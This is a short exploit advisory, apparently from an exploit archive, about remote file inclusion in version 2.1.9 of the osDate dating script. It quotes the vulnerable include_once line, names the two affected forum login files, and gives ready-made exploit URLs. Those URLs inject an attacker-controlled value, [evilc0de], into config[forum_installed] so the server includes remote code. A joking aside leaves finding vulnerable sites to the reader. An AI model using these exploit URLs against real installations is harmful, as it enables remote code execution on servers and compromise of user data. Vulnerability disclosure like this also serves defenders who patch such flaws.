id: 11301
date: 03/15/2010
title: osDate v 2.1.9 - Remote File Inclusion Vulnerabilities
author: NoGe
cves: 

======================================================
osDate v 2.1.9 - Remote File Inclusion Vulnerabilities
======================================================

========================================================================================
[o] osDate Remote File Inclusion Vulnerabilities
Software : osDate dating and matchmaking script version 2.1.9 [mostly affected]
Vendor   : http://www.tufat.com/
Download : http://www.tufat.com/s_free_dating_system.htm
Author   : NoGe
========================================================================================
[o] Vulnerable file
include_once($config['forum_installed'] . "_forum.php");
    forum/adminLogin.php
    forum/userLogin.php
[o] Exploit
       http://localhost/[path]/forum/adminLogin.php?config[forum_installed]=[evilc0de]
       http://localhost/[path]/forum/userLogin.php?config[forum_installed]=[evilc0de]
[o] Dork
       cari ndiri yee.. gampang koq dork na.. :p
========================================================================================



#  0day.today [2023-03-25]  #